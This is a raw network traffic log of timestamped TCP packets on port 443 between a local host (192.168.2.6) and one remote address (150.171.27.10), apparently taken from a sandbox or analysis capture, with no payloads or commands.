Nov 21, 2024 09:53:49.112977028 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.113042116 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.113054991 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.113080978 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.113105059 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.113121986 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.117835999 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.117862940 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.117907047 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.117921114 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.117947102 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.117966890 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.124345064 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.124365091 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.124435902 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.124465942 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.124994040 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.129424095 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.129456043 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.129503965 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.129513025 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.129548073 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.136920929 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.136945009 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.136986017 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.136995077 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.137022972 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.137042046 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.137058973 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.137074947 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.137140036 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.137140036 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.137164116 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.137449026 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.142312050 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.142342091 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.142400026 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.142407894 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.142447948 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.151797056 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.151814938 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.151918888 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.151946068 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.152203083 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.155247927 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.155266047 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.155328035 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.155338049 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.155363083 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.155380011 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.157143116 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.157181978 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.157216072 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.157223940 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.157262087 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.166531086 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.166548014 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.166764975 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.166781902 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.166968107 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.173058987 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.173093081 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.173131943 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.173163891 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.173183918 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.173274994 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.176708937 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.176728964 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.176795006 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.176820993 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.176841021 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.176891088 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.180326939 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.180355072 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.180392027 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.180423021 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.180541992 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.180541992 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.185801983 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.185828924 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.185883999 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.185893059 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.185930014 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.195036888 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.195055008 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.195147991 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.195147991 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.195172071 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.195251942 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.239016056 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.239068031 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.239085913 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.239120007 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.239142895 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.239157915 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.253259897 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.253284931 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.253323078 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.253334999 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.253360987 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.253377914 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.269520998 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.269541979 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.269579887 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.269588947 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.269628048 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.285660028 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.285684109 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.285722017 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.285729885 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.285758018 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.285773039 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.297647953 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.297668934 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.297707081 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.297734022 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.297749043 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.297769070 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.300581932 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.300606012 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.300646067 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.300652981 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.300683022 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.300700903 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.302164078 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.302197933 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.302236080 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.302263975 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.302273035 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.302293062 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.322258949 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.322278023 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.322359085 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.322381020 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.322662115 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.322694063 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.322721004 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.322722912 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.322731972 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.322731018 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.322753906 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.322770119 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.322794914 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.322809935 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.322829962 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.322846889 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.322863102 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.323147058 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.323172092 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.323199987 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.323206902 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.323235035 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.323256016 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.323467970 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.323483944 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.323543072 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.323550940 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.323636055 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.323648930 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.323671103 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.323702097 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.323709011 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.323729038 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.323736906 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.323748112 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.328102112 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.328147888 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.328196049 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.328203917 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.328241110 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.329873085 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.329889059 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.330034018 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.330034018 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.330044031 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.330224991 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.330852032 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.330874920 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.330934048 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.330940962 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.330979109 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.334666967 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.334696054 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.334763050 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.334790945 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.334805965 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.334989071 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.341089010 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.341108084 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.341175079 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.341185093 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.341331959 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.343486071 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.343570948 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.343599081 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.343646049 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.343671083 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.343691111 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.345813036 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.345839977 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.345884085 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.345892906 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.345946074 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.350189924 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.350207090 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.350279093 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.350291014 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.350359917 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.350359917 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.353291988 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.353317022 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.353383064 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.353399038 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.353429079 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.353449106 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.356331110 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.356378078 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.356410980 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.356426954 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.356462955 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.356483936 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.361062050 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.361133099 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.361149073 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.361170053 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.361229897 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.361229897 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.365375042 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.365421057 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.365453959 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.365462065 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.365494967 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.365511894 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.367572069 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.367649078 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.367685080 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.367692947 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.367726088 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.367739916 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.375176907 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.375236988 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.375262022 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.375271082 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.375302076 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.375339031 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.377151966 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.377209902 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.377242088 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.377249956 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.377275944 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.377295971 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.435512066 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.435543060 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.435615063 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.435693026 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.435729027 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.435750961 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.446367025 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.446392059 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.446456909 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.446472883 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.446522951 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.446522951 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.457578897 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.457602024 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.457648993 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.457664967 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.457691908 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.457711935 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.468501091 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.468524933 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.468576908 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.468611956 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.468647003 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.468818903 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.478784084 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.478805065 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.478857994 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.478873014 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.478902102 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.478921890 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.483570099 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.483589888 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.483680010 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.483680010 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.483696938 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.483831882 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.489595890 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.489617109 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.489670038 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.489686966 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.489713907 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.489732027 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.491327047 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.491337061 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.491449118 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.491457939 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.491544962 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.494621992 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.494698048 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.494720936 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.494750023 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.494777918 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.494801044 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.498308897 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.498326063 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.498397112 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.498414040 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.498496056 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.499083042 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.499109983 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.499157906 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.499175072 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.499206066 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.499224901 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.503596067 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.503647089 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.503684044 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.503699064 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.503730059 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.503751040 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.506346941 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.506366968 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.506535053 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.506551981 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.506685972 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.510051012 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.510071993 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.510123968 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.510139942 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.510178089 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.510195017 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.512259007 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.512291908 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.512335062 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.512348890 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.512376070 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.512707949 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.514364958 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.514381886 CET	443	49759	150.171.27.10	192.168.2.6
